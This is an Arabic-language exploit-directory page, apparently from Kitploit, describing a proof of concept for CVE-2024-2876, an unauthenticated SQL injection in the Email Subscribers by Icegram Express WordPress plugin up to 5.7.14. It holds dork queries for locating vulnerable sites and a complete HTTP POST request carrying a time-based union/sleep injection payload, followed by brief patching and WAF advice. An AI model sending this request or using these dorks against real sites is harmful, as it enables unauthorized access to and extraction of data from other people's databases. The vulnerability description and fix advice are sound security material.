Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/babydessy/cve-2024-2876
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

إثبات مفهوم لـ CVE-2024-2876، وهو حقن SQL غير مُصادَق عليه في إضافة Email Subscribers لـ WordPress، مع استعلامات dork وطلب استغلال فعّال.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-2876

#وصف الثغرة: إن إضافة Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce الخاصة بـ WordPress معرّضة لثغرة SQL Injection عبر دالة 'run' في الصنف 'IG_ES_Subscribers_Query' في جميع الإصدارات حتى الإصدار 5.7.14 ضمناً، وذلك بسبب عدم كفاية التهريب (escaping) على المعامل المُدخَل من المستخدم وعدم كفاية التحضير (preparation) في استعلام SQL الحالي. وهذا يتيح للمهاجمين غير المصادَق عليهم إلحاق استعلامات SQL إضافية داخل الاستعلامات الموجودة مسبقاً، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#كيفية الإصلاح؟ نظراً لأن جميع الإصدارات حتى 5.7.14 تم اكتشاف إصابتها بهذه الثغرة (CVE)، يُوصى للمستخدمين بترقية إضافة Email Subscribers by Icegram Express إلى الإصدار 5.7.15 (أو أحدث إصدار 5.7.19). يتوفر لمستخدمي Patchstack خيار تمكين التحديثات التلقائية تحديداً للإضافات المعرّضة للثغرات. طبّق حلاً من حلول WAF/WAAP كطبقة حماية إضافية. وتكمن ميزة هذه الحلول في أنه حتى لو كانت الثغرة جديدة وغير معروفة (0-day)، فقد تظل قادرة على منع الهجمات من خلال اكتشاف أنماط وتقنيات الاستغلال.

#Resource: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

تنزيل الأداة